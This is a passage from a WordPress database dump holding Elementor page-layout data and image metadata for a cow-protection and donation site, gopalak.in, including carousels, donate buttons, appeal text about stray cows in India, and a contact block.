ds\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10329,1724,'_elementor_page_assets','a:0:{}'),(10332,1725,'_wp_attached_file','2022/10/Contribute-123.png'),(10333,1725,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1263;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2022/10/Contribute-123.png\";s:8:\"filesize\";i:165782;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"Contribute-123-300x119.png\";s:5:\"width\";i:300;s:6:\"height\";i:119;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48509;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"Contribute-123-1024x405.png\";s:5:\"width\";i:1024;s:6:\"height\";i:405;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:447619;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"Contribute-123-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27284;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"Contribute-123-768x304.png\";s:5:\"width\";i:768;s:6:\"height\";i:304;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:262216;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:26:\"Contribute-123-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:102715;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"Contribute-123-50x20.png\";s:5:\"width\";i:50;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2212;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:26:\"Contribute-123-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13416;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:24:\"Contribute-123-48x19.png\";s:5:\"width\";i:48;s:6:\"height\";i:19;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2080;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:24:\"Contribute-123-48x19.png\";s:5:\"width\";i:48;s:6:\"height\";i:19;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2080;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10334,1726,'_elementor_edit_mode','builder'),(10335,1726,'_elementor_template_type','wp-page'),(10336,1726,'_elementor_version','3.7.8'),(10337,1726,'_wp_page_template','default'),(10338,1726,'_elementor_data','[{\"id\":\"3d9de82\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5605bb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eeb943c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\",\"id\":1628,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-55\",\"right\":\"-12\",\"bottom\":\"0\",\"left\":\"-25\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1e0e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1e51603\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d48ab42\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49e13ac\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fe61f38\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8c33583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(10339,1726,'_elementor_page_assets','a:0:{}'),(10340,1726,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(10342,1727,'_elementor_edit_mode','builder'),(10343,1727,'_elementor_template_type','wp-page'),(10344,1727,'_elementor_version','3.7.8'),(10345,1727,'_wp_page_template','default'),(10346,1727,'_elementor_data','[{\"id\":\"3d9de82\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5605bb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eeb943c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\",\"id\":1628,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-55\",\"right\":\"-12\",\"bottom\":\"0\",\"left\":\"-25\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1e0e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1e51603\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d48ab42\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49e13ac\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fe61f38\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8c33583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(10347,1727,'_elementor_page_assets','a:0:{}'),(10348,1727,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(10350,1728,'_elementor_edit_mode','builder'),(10351,1728,'_elementor_template_type','wp-page'),(10352,1728,'_elementor_version','3.7.8'),(10353,1728,'_wp_page_template','default'),(10354,1728,'_elementor_data','[{\"id\":\"3d9de82\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5605bb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eeb943c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-55\",\"right\":\"-12\",\"bottom\":\"0\",\"left\":\"-25\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1e0e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1e51603\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d48ab42\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49e13ac\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fe61f38\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8c33583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(10355,1728,'_elementor_page_assets','a:0:{}'),(10356,1728,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(10378,1730,'_elementor_edit_mode','builder'),(10379,1730,'_elementor_template_type','wp-page'),(10380,1730,'_elementor_version','3.7.8'),(10381,1730,'_wp_page_template','elementor_canvas'),(10382,1730,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\